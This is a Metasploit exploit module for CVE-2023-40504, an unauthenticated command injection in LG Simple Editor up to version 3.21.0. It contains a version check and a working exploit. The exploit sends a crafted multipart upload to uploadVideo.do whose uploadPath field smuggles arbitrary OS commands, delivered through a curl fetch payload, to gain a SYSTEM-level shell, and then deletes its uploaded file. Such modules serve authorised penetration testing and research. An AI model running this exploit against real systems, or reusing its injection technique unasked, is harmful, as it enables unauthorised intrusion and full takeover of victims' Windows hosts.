class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'LG Simple Editor Command Injection (CVE-2023-40504)',
        'Description' => %q{
          Unauthenticated Command Injection in LG Simple Editor <= v3.21.0.
          The vulnerability can be exploited by a remote attacker to inject arbitrary operating system commands which will get executed in the context of NT AUTHORITY\SYSTEM.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'rgod', # Vulnerability discovery
          'Michael Heinzl' # MSF module
        ],
        'References' => [
          [ 'URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-1208/'],
          [ 'CVE', '2023-40504']
        ],
        'DisclosureDate' => '2023-08-04',
        'Platform' => 'win',
        'Targets' => [
          [
            'Windows_Fetch',
            {
              'Arch' => [ ARCH_CMD ],
              'Platform' => 'win',
              'DefaultOptions' => { 'FETCH_COMMAND' => 'CURL' },
              'Type' => :win_fetch,
              'Payload' => {
                'BadChars' => '\\'
              }
            }
          ]
        ],
        'DefaultTarget' => 0,

        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('TARGETURI', [true, 'The URI of the LG Simple Editor', '/'])
      ]
    )
  end

  # Determine if the Simple Editor instance runs a vulnerable version
  # copied from lg_simple_editor_rce.rb
  def check
    res = send_request_cgi(
      {
        'method' => 'GET',
        'uri' => normalize_uri(target_uri, 'simpleeditor', 'common', 'commonReleaseNotes.do')
      }
    )

    return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?

    version_text = res.get_html_document.xpath('//h2')[0]&.text&.gsub('v', '')
    return Exploit::CheckCode::Unknown if version_text.blank? || version_text == 'Unknown'

    version = Rex::Version.new(version_text)
    return Exploit::CheckCode::Unknown if version == Rex::Version.new('0')
    return Exploit::CheckCode::Appears("Version: #{version}") if version <= Rex::Version.new('3.21.0')

    Exploit::CheckCode::Safe
  end

  def exploit
    execute_command(payload.encoded)
  end

  def execute_command(cmd)
    print_status('Sending command injection...')
    exec_simplerce(cmd)
    print_status('Exploit finished, check thy shell.')
  end

  # Send command injection
  def exec_simplerce(cmd)
    filename = Rex::Text.rand_text_alpha(1..6)
    vprint_status("Using random filename: #{filename}.mp4")
    form = Rex::MIME::Message.new
    form.add_part('/', nil, nil, "form-data; name=\"uploadVideo\"; filename=\"#{filename}.mp4\"")
    form.add_part("/\"&#{cmd}&cd ..&cd ..&cd ..&cd server&cd webapps&cd simpleeditor&del #{filename}.mp4&/../", nil, nil, 'form-data; name="uploadPath"')
    form.add_part('1', nil, nil, 'form-data; name="uploadFile_x"')
    form.add_part('1', nil, nil, 'form-data; name="uploadFile_width"')
    form.add_part('1', nil, nil, 'form-data; name="uploadFile_height"')

    res = send_request_cgi(
      {
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path, 'simpleeditor', 'imageManager', 'uploadVideo.do'),
        'ctype' => "multipart/form-data; boundary=#{form.bound}",
        'data' => form.to_s
      }
    )
    if res && res.code == 200
      print_good 'Command injection sent.'
    else
      fail_with(Failure::UnexpectedReply, "#{peer}: Unexpected response received.")
    end
  end

end
